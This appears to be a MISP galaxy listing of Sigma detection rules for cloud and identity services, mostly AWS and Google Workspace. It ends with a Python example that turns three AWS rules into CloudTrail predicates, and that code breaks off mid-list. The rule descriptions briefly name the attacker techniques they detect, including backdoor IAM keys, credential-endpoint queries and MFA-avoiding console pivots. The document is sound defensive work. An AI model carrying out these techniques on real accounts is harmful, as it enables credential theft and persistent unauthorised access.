author Austin Songer
creation_date 2021/08/24
falsepositive ['Unknown']
filename gcp_gworkspace_role_privilege_deleted.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.impact']

Google Workspace MFA Disabled

Detects when multi-factor authentication (MFA) is disabled.

Internal MISP references

UUID 780601d1-6376-4f2a-884e-b8d45599f78c which can be used as unique global reference for Google Workspace MFA Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/08/26
falsepositive ['Disabling MFA may be performed by a system administrator.']
filename gcp_gworkspace_mfa_disabled.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.impact']

Google Workspace Application Access Level Modified

Detects when an access level is changed for a Google Workspace application. An access level is part of BeyondCorp Enterprise, which is Google Workspace's way of enforcing the Zero Trust model. An adversary would be able to remove access levels to gain easier access to Google Workspace resources.

Internal MISP references

UUID 22f2fb54-5312-435d-852f-7c74f81684ca which can be used as unique global reference for Google Workspace Application Access Level Modified in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bryan Lim
creation_date 2024/01/12
falsepositive ['Legitimate administrative activities changing the access levels for an application']
filename gcp_gworkspace_application_access_levels_modified.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1098.003']
Related clusters

To see the related clusters, click here.

Google Workspace Application Removed

Detects when an application is removed from Google Workspace.

Internal MISP references

UUID ee2803f0-71c8-4831-b48b-a1fc57601ee4 which can be used as unique global reference for Google Workspace Application Removed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/08/26
falsepositive ['Application being removed may be performed by a System Administrator.']
filename gcp_gworkspace_application_removed.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.impact']

Google Workspace Granted Domain API Access

Detects when an API access service account is granted domain authority.

Internal MISP references

UUID 04e2a23a-9b29-4a5c-be3a-3542e3f982ba which can be used as unique global reference for Google Workspace Granted Domain API Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/08/23
falsepositive ['Unknown']
filename gcp_gworkspace_granted_domain_api_access.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Google Workspace User Granted Admin Privileges

Detects when a Google Workspace user is granted admin privileges.

Internal MISP references

UUID 2d1b83e4-17c6-4896-a37b-29140b40a788 which can be used as unique global reference for Google Workspace User Granted Admin Privileges in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/08/23
falsepositive ['Google Workspace admin role privileges may be modified by system administrators.']
filename gcp_gworkspace_user_granted_admin_privileges.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Google Workspace Role Modified or Deleted

Detects when a role is modified or deleted in Google Workspace.

Internal MISP references

UUID 6aef64e3-60c6-4782-8db3-8448759c714e which can be used as unique global reference for Google Workspace Role Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/08/24
falsepositive ['Unknown']
filename gcp_gworkspace_role_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.impact']

Cisco Duo Successful MFA Authentication Via Bypass Code

Detects when a successful MFA authentication occurs due to the use of a bypass code. A bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as "backup codes," so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems.

Internal MISP references

UUID 6f7e1c10-2dc9-4312-adb6-9574ff09a5c8 which can be used as unique global reference for Cisco Duo Successful MFA Authentication Via Bypass Code in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Khalimonenkov
creation_date 2024/04/17
falsepositive ['Legitimate user that was assigned on purpose to a bypass group']
filename cisco_duo_mfa_bypass_via_bypass_code.yml
level medium
logsource.category No established category
logsource.product cisco
tags ['attack.credential_access', 'attack.defense_evasion', 'attack.initial_access']

OneLogin User Assumed Another User

Detects when a user assumes another user's account.

Internal MISP references

UUID 62fff148-278d-497e-8ecd-ad6083231a35 which can be used as unique global reference for OneLogin User Assumed Another User in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/10/12
falsepositive ['Unknown']
filename onelogin_assumed_another_user.yml
level low
logsource.category No established category
logsource.product onelogin
tags ['attack.impact']

OneLogin User Account Locked

Detects when a user account is locked or suspended.

Internal MISP references

UUID a717c561-d117-437e-b2d9-0118a7035d01 which can be used as unique global reference for OneLogin User Account Locked in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/10/12
falsepositive ['System may lock or suspend user accounts.']
filename onelogin_user_account_locked.yml
level low
logsource.category No established category
logsource.product onelogin
tags ['attack.impact']

AWS S3 Data Management Tampering

Detects when a user tampers with S3 data management in Amazon Web Services.

Internal MISP references

UUID 78b3756a-7804-4ef7-8555-7b9024a02e2d which can be used as unique global reference for AWS S3 Data Management Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/07/24
falsepositive ['A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename aws_s3_data_management_tampering.yml
level low
logsource.category No established category
logsource.product aws
tags ['attack.exfiltration', 'attack.t1537']

AWS EC2 Disable EBS Encryption

Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes.

Internal MISP references

UUID 16124c2d-e40b-4fcc-8f2c-5ab7870a2223 which can be used as unique global reference for AWS EC2 Disable EBS Encryption in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sittikorn S
creation_date 2021/06/29
falsepositive ['System Administrator Activities', 'DEV, UAT, SAT environment. You should apply this rule with PROD account only.']
filename aws_ec2_disable_encryption.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.impact', 'attack.t1486', 'attack.t1565']

AWS IAM Backdoor Users Keys

Detects AWS API key creation for a user by another user. Backdoored users can be used to obtain persistence in the AWS environment. This alert can also be used to track the flow of AWS keys in your organization.

Internal MISP references

UUID 0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2 which can be used as unique global reference for AWS IAM Backdoor Users Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author faloker
creation_date 2020/02/12
falsepositive ['Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming)', 'AWS API keys legitimate exchange workflows']
filename aws_iam_backdoor_users_keys.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.persistence', 'attack.t1098']

AWS SecurityHub Findings Evasion

Detects the modification of the findings on SecurityHub.

Internal MISP references

UUID a607e1fe-74bf-4440-a3ec-b059b9103157 which can be used as unique global reference for AWS SecurityHub Findings Evasion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sittikorn S
creation_date 2021/06/28
falsepositive ['System or Network administrator behaviors', 'DEV, UAT, SAT environment. You should apply this rule with PROD environment only.']
filename aws_securityhub_finding_evasion.yml
level high
logsource.category No established category
logsource.product aws
tags ['attack.defense_evasion', 'attack.t1562']

SES Identity Has Been Deleted

Detects an instance of an SES identity being deleted via the "DeleteIdentity" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities.

Internal MISP references

UUID 20f754db-d025-4a8f-9d74-e0037e999a9a which can be used as unique global reference for SES Identity Has Been Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Janantha Marasinghe
creation_date 2022/12/13
falsepositive ['Unknown']
filename aws_delete_identity.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.defense_evasion', 'attack.t1070']

AWS Snapshot Backup Exfiltration

Detects the modification of an EC2 snapshot's permissions to enable access from another account.

Internal MISP references

UUID abae8fec-57bd-4f87-aff6-6e3db989843d which can be used as unique global reference for AWS Snapshot Backup Exfiltration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Darin Smith
creation_date 2021/05/17
falsepositive ["Valid change to a snapshot's permissions"]
filename aws_snapshot_backup_exfiltration.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.exfiltration', 'attack.t1537']

AWS EFS Fileshare Mount Modified or Deleted

Detects when an EFS file share mount target is modified or deleted. Deleting a mount target breaks any file system access that relied on it, which might disrupt instances or applications using those mounts.

Internal MISP references

UUID 6a7ba45c-63d8-473e-9736-2eaabff79964 which can be used as unique global reference for AWS EFS Fileshare Mount Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/15
falsepositive ['Unknown']
filename aws_efs_fileshare_mount_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.impact', 'attack.t1485']

AWS Route 53 Domain Transferred to Another Account

Detects when a request has been made to transfer a Route 53 domain to another AWS account.

Internal MISP references

UUID b056de1a-6e6e-4e40-a67e-97c9808cf41b which can be used as unique global reference for AWS Route 53 Domain Transferred to Another Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Elastic, Austin Songer @austinsonger
creation_date 2021/07/22
falsepositive ['A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename aws_route_53_domain_transferred_to_another_account.yml
level low
logsource.category No established category
logsource.product aws
tags ['attack.persistence', 'attack.credential_access', 'attack.t1098']

AWS STS AssumeRole Misuse

Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.

Internal MISP references

UUID 905d389b-b853-46d0-9d3d-dea0d3a3cd49 which can be used as unique global reference for AWS STS AssumeRole Misuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/07/24
falsepositive ['AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.', 'Automated processes that uses Terraform may lead to false positives.']
filename aws_sts_assumerole_misuse.yml
level low
logsource.category No established category
logsource.product aws
tags ['attack.lateral_movement', 'attack.privilege_escalation', 'attack.t1548', 'attack.t1550', 'attack.t1550.001']

AWS RDS Master Password Change

Detects the change of database master password. It may be a part of data exfiltration.

Internal MISP references

UUID 8a63cdd4-6207-414a-85bc-7e032bd3c1a2 which can be used as unique global reference for AWS RDS Master Password Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author faloker
creation_date 2020/02/12
falsepositive ['Benign changes to a db instance']
filename aws_rds_change_master_password.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.exfiltration', 'attack.t1020']

AWS ElastiCache Security Group Modified or Deleted

Identifies when an ElastiCache security group has been modified or deleted.

Internal MISP references

UUID 7c797da2-9cf2-4523-ba64-33b06339f0cc which can be used as unique global reference for AWS ElastiCache Security Group Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/07/24
falsepositive ['A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename aws_elasticache_security_group_modified_or_deleted.yml
level low
logsource.category No established category
logsource.product aws
tags ['attack.impact', 'attack.t1531']

AWS Suspicious SAML Activity

Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.

Internal MISP references

UUID f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e which can be used as unique global reference for AWS Suspicious SAML Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/09/22
falsepositive ['Automated processes that uses Terraform may lead to false positives.', 'SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename aws_susp_saml_activity.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.initial_access', 'attack.t1078', 'attack.lateral_movement', 'attack.t1548', 'attack.privilege_escalation', 'attack.t1550', 'attack.t1550.001']

AWS EKS Cluster Created or Deleted

Identifies when an EKS cluster is created or deleted.

Internal MISP references

UUID 33d50d03-20ec-4b74-a74e-1e65a38af1c0 which can be used as unique global reference for AWS EKS Cluster Created or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/08/16
falsepositive ['EKS Cluster being created or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename aws_eks_cluster_created_or_deleted.yml
level low
logsource.category No established category
logsource.product aws
tags ['attack.impact', 'attack.t1485']

Restore Public AWS RDS Instance

Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration.

Internal MISP references

UUID c3f265c7-ff03-4056-8ab2-d486227b4599 which can be used as unique global reference for Restore Public AWS RDS Instance in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author faloker
creation_date 2020/02/12
falsepositive ['Unknown']
filename aws_rds_public_db_restore.yml
level high
logsource.category No established category
logsource.product aws
tags ['attack.exfiltration', 'attack.t1020']

AWS IAM S3Browser Templated S3 Bucket Policy Creation

Detects the S3 Browser utility creating an inline IAM policy containing the default S3 bucket name placeholder value of "".

Internal MISP references

UUID db014773-7375-4f4e-b83b-133337c0ffee which can be used as unique global reference for AWS IAM S3Browser Templated S3 Bucket Policy Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author daniel.bohannon@permiso.io (@danielhbohannon)
creation_date 2023/05/17
falsepositive ['Valid usage of S3 browser with accidental creation of default Inline IAM policy without changing default S3 bucket name placeholder value']
filename aws_iam_s3browser_templated_s3_bucket_policy_creation.yml
level high
logsource.category No established category
logsource.product aws
tags ['attack.execution', 'attack.t1059.009', 'attack.persistence', 'attack.t1078.004']

AWS CloudTrail Important Change

Detects the disabling, deletion, or updating of a CloudTrail trail.

Internal MISP references

UUID 4db60cc0-36fb-42b7-9b58-a5b53019fb74 which can be used as unique global reference for AWS CloudTrail Important Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author vitaliy0x1
creation_date 2020/01/21
falsepositive ['Valid change in a Trail']
filename aws_cloudtrail_disable_logging.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.defense_evasion', 'attack.t1562.001']

AWS EC2 Startup Shell Script Change

Detects changes to the EC2 instance startup script. The shell script is executed as root/SYSTEM every time the affected instance boots.

Internal MISP references

UUID 1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df which can be used as unique global reference for AWS EC2 Startup Shell Script Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author faloker
creation_date 2020/02/12
falsepositive ['Valid changes to the startup script']
filename aws_ec2_startup_script_change.yml
level high
logsource.category No established category
logsource.product aws
tags ['attack.execution', 'attack.t1059.001', 'attack.t1059.003', 'attack.t1059.004']

Potential Bucket Enumeration on AWS

Looks for potential enumeration of AWS buckets via ListBuckets.

Internal MISP references

UUID f305fd62-beca-47da-ad95-7690a0620084 which can be used as unique global reference for Potential Bucket Enumeration on AWS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @securepeacock, SCYTHE @scythe_io
creation_date 2023/01/06
falsepositive ['Administrators listing buckets, it may be necessary to filter out users who commonly conduct this activity.']
filename aws_enum_buckets.yml
level low
logsource.category No established category
logsource.product aws
tags ['attack.discovery', 'attack.t1580']

AWS User Login Profile Was Modified

An attacker with the iam:UpdateLoginProfile permission on other users can change the console login password of any user that already has a login profile set up. This alert detects anyone changing the password on behalf of another user.

Internal MISP references

UUID 055fb148-60f8-462d-ad16-26926ce050f1 which can be used as unique global reference for AWS User Login Profile Was Modified in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author toffeebr33k
creation_date 2021/08/09
falsepositive ['Legit User Account Administration']
filename aws_update_login_profile.yml
level high
logsource.category No established category
logsource.product aws
tags ['attack.persistence', 'attack.t1098']

AWS EC2 VM Export Failure

An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.

Internal MISP references

UUID 54b9a76a-3c71-4673-b4b3-2edb4566ea7b which can be used as unique global reference for AWS EC2 VM Export Failure in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Diogo Braz
creation_date 2020/04/16
falsepositive No established falsepositives
filename aws_ec2_vm_export_failure.yml
level low
logsource.category No established category
logsource.product aws
tags ['attack.collection', 'attack.t1005', 'attack.exfiltration', 'attack.t1537']

AWS Identity Center Identity Provider Change

Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider. A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation.

Internal MISP references

UUID d3adb3ef-b7e7-4003-9092-1924c797db35 which can be used as unique global reference for AWS Identity Center Identity Provider Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael McIntyre @wtfender
creation_date 2023/09/27
falsepositive ["Authorized changes to the AWS account's identity provider"]
filename aws_sso_idp_change.yml
level high
logsource.category No established category
logsource.product aws
tags ['attack.persistence', 'attack.t1556']

AWS STS GetSessionToken Misuse

Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.

Internal MISP references

UUID b45ab1d2-712f-4f01-a751-df3826969807 which can be used as unique global reference for AWS STS GetSessionToken Misuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/07/24
falsepositive ['GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename aws_sts_getsessiontoken_misuse.yml
level low
logsource.category No established category
logsource.product aws
tags ['attack.lateral_movement', 'attack.privilege_escalation', 'attack.t1548', 'attack.t1550', 'attack.t1550.001']

AWS ECS Task Definition That Queries The Credential Endpoint

Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint. This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.

Internal MISP references

UUID b94bf91e-c2bf-4047-9c43-c6810f43baad which can be used as unique global reference for AWS ECS Task Definition That Queries The Credential Endpoint in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Darin Smith
creation_date 2022/06/07
falsepositive ['Task Definition being modified to request credentials from the Task Metadata Service for valid reasons']
filename aws_ecs_task_definition_cred_endpoint_query.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.persistence', 'attack.t1525']

AWS IAM S3Browser LoginProfile Creation

Detects the S3 Browser utility performing reconnaissance for existing IAM users without a LoginProfile defined and then, when one is found, creating a LoginProfile for it.

Internal MISP references

UUID db014773-b1d3-46bd-ba26-133337c0ffee which can be used as unique global reference for AWS IAM S3Browser LoginProfile Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author daniel.bohannon@permiso.io (@danielhbohannon)
creation_date 2023/05/17
falsepositive ['Valid usage of S3 Browser for IAM LoginProfile listing and/or creation']
filename aws_iam_s3browser_loginprofile_creation.yml
level high
logsource.category No established category
logsource.product aws
tags ['attack.execution', 'attack.persistence', 'attack.t1059.009', 'attack.t1078.004']

AWS GuardDuty Important Change

Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.

Internal MISP references

UUID 6e61ee20-ce00-4f8d-8aee-bedd8216f7e3 which can be used as unique global reference for AWS GuardDuty Important Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author faloker
creation_date 2020/02/11
falsepositive ['Valid change in the GuardDuty (e.g. to ignore internal scanners)']
filename aws_guardduty_disruption.yml
level high
logsource.category No established category
logsource.product aws
tags ['attack.defense_evasion', 'attack.t1562.001']

AWS Attached Malicious Lambda Layer

Detects when a user attaches a Lambda layer to an existing function to override a library that is in use by the function, so that their malicious code could use the function's IAM role for AWS API calls. This would give an adversary access to the privileges associated with the Lambda service role attached to that function.

Internal MISP references

UUID 97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d which can be used as unique global reference for AWS Attached Malicious Lambda Layer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/09/23
falsepositive ['Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename aws_attached_malicious_lambda_layer.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.privilege_escalation']

AWS Route 53 Domain Transfer Lock Disabled

Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.

Internal MISP references

UUID 3940b5f1-3f46-44aa-b746-ebe615b879e0 which can be used as unique global reference for AWS Route 53 Domain Transfer Lock Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Elastic, Austin Songer @austinsonger
creation_date 2021/07/22
falsepositive ['A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename aws_route_53_domain_transferred_lock_disabled.yml
level low
logsource.category No established category
logsource.product aws
tags ['attack.persistence', 'attack.credential_access', 'attack.t1098']

AWS EFS Fileshare Modified or Deleted

Detects when an EFS file share is modified or deleted. A file system that is in use cannot be deleted: if it has any mount targets, the adversary must first delete them, so deletion of a mount target will occur before deletion of the file share.

Internal MISP references

UUID 25cb1ba1-8a19-4a23-a198-d252664c8cef which can be used as unique global reference for AWS EFS Fileshare Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/15
falsepositive ['Unknown']
filename aws_efs_fileshare_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.impact']

AWS Console GetSigninToken Potential Abuse

Detects potentially suspicious events involving "GetSigninToken". An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credentials that help obfuscate which AWS credential is compromised (the original access key) and enable the adversary to pivot from the AWS CLI to console sessions without the need for MFA, using the new access key issued in this request.

Internal MISP references

UUID f8103686-e3e8-46f3-be72-65f7fcb4aa53 which can be used as unique global reference for AWS Console GetSigninToken Potential Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Chester Le Bron (@123Le_Bron)
creation_date 2024/02/26
falsepositive ['GetSigninToken events will occur when using AWS SSO portal to login and will generate false positives if you do not filter for the expected user agent(s), see filter. Non-SSO configured roles would be abnormal and should be investigated.']
filename aws_console_getsignintoken.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.lateral_movement', 'attack.t1021.007', 'attack.t1550.001']

AWS Glue Development Endpoint Activity

Detects possible suspicious Glue development endpoint activity.

Internal MISP references

UUID 4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26 which can be used as unique global reference for AWS Glue Development Endpoint Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/10/03
falsepositive ['Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'If known behavior is causing false positives, it can be exempted from the rule.']
filename aws_passed_role_to_glue_development_endpoint.yml
level low
logsource.category No established category
logsource.product aws
tags ['attack.privilege_escalation']

AWS Root Credentials

Detects AWS root account usage.

Internal MISP references

UUID 8ad1600d-e9dc-4251-b0ee-a65268f29add which can be used as unique global reference for AWS Root Credentials in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author vitaliy0x1
creation_date 2020/01/21
falsepositive ['AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html']
filename aws_root_account_usage.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.privilege_escalation', 'attack.t1078.004']

AWS IAM S3Browser User or AccessKey Creation

Detects the S3 Browser utility creating an IAM User or AccessKey.

Internal MISP references

UUID db014773-d9d9-4792-91e5-133337c0ffee which can be used as unique global reference for AWS IAM S3Browser User or AccessKey Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author daniel.bohannon@permiso.io (@danielhbohannon)
creation_date 2023/05/17
falsepositive ['Valid usage of S3 Browser for IAM User and/or AccessKey creation']
filename aws_iam_s3browser_user_or_accesskey_creation.yml
level high
logsource.category No established category
logsource.product aws
tags ['attack.execution', 'attack.persistence', 'attack.t1059.009', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

AWS Config Disabling Channel/Recorder

Detects AWS Config Service disabling

Internal MISP references

UUID 07330162-dba1-4746-8121-a9647d49d297 which can be used as unique global reference for AWS Config Disabling Channel/Recorder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author vitaliy0x1
creation_date 2020/01/21
falsepositive ['Valid change in AWS Config Service']
filename aws_config_disable_recording.yml
level high
logsource.category No established category
logsource.product aws
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

AWS ElastiCache Security Group Created

Detects when an ElastiCache security group has been created.

Internal MISP references

UUID 4ae68615-866f-4304-b24b-ba048dfa5ca7 which can be used as unique global reference for AWS ElastiCache Security Group Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/07/24
falsepositive ['An ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename aws_elasticache_security_group_created.yml
level low
logsource.category No established category
logsource.product aws
tags ['attack.persistence', 'attack.t1136', 'attack.t1136.003']
Related clusters

To see the related clusters, click here.

AWS S3 Bucket Versioning Disable

Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects.

Internal MISP references

UUID a136ac98-b2bc-4189-a14d-f0d0388e57a7 which can be used as unique global reference for AWS S3 Bucket Versioning Disable in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sean Johnstone
creation_date 2023/10/28
falsepositive ['AWS administrator legitimately disabling bucket versioning']
filename aws_disable_bucket_versioning.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.
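The three AWS rules above (root credential use, Config recorder or delivery channel disabled, S3 versioning suspended) all reduce to field matches on CloudTrail records. The following is an added example, not code from the Sigma project or from the MISP galaxy: the three detections as Python predicates run over constructed CloudTrail events. Field names follow the CloudTrail record format (eventSource, eventName, eventType, userIdentity, requestParameters); the nested requestParameters.VersioningConfiguration.Status path is an assumption about how PutBucketVersioning is recorded, and the exclusion of eventType AwsServiceEvent is this example's way of not alerting on actions AWS performs on the account's behalf. Account IDs and ARNs are placeholders.

```python
"""Added example: three CloudTrail detections as predicates over constructed events.

Field names follow the CloudTrail record format. The
requestParameters.VersioningConfiguration.Status path is an assumed shape for
PutBucketVersioning records; the account IDs and ARNs below are placeholders.
"""
import json


def is_root_usage(ev: dict) -> bool:
    """AWS Root Credentials: a Root principal, excluding events AWS itself
    initiates on the account's behalf (eventType AwsServiceEvent)."""
    return (ev.get("userIdentity", {}).get("type") == "Root"
            and ev.get("eventType") != "AwsServiceEvent")


def is_config_disabled(ev: dict) -> bool:
    """AWS Config Disabling Channel/Recorder: recorder stopped or delivery channel deleted."""
    return (ev.get("eventSource") == "config.amazonaws.com"
            and ev.get("eventName") in {"StopConfigurationRecorder", "DeleteDeliveryChannel"})


def is_versioning_disabled(ev: dict) -> bool:
    """AWS S3 Bucket Versioning Disable: PutBucketVersioning with Status Suspended."""
    if ev.get("eventSource") != "s3.amazonaws.com" or ev.get("eventName") != "PutBucketVersioning":
        return False
    params = ev.get("requestParameters") or {}
    status = (params.get("VersioningConfiguration") or {}).get("Status")
    return status == "Suspended"


# Rule name -> (predicate, level as listed in the cluster metadata above)
RULES = {
    "AWS Root Credentials": (is_root_usage, "medium"),
    "AWS Config Disabling Channel/Recorder": (is_config_disabled, "high"),
    "AWS S3 Bucket Versioning Disable": (is_versioning_disabled, "medium"),
}


def actor_of(ev: dict) -> str:
    """Best available principal identifier for triage."""
    ident = ev.get("userIdentity", {})
    return ident.get("arn") or ident.get("userName") or ident.get("type", "unknown")


def scan(raw_events):
    """Parse CloudTrail JSON records (one per string) and return one alert per rule hit."""
    alerts = []
    for raw in raw_events:
        ev = json.loads(raw)
        for name, (predicate, level) in RULES.items():
            if predicate(ev):
                alerts.append({"rule": name, "level": level,
                               "eventTime": ev.get("eventTime"),
                               "eventName": ev.get("eventName"),
                               "actor": actor_of(ev)})
    return alerts


# Constructed sample records (not real logs).
SAMPLE_EVENTS = [
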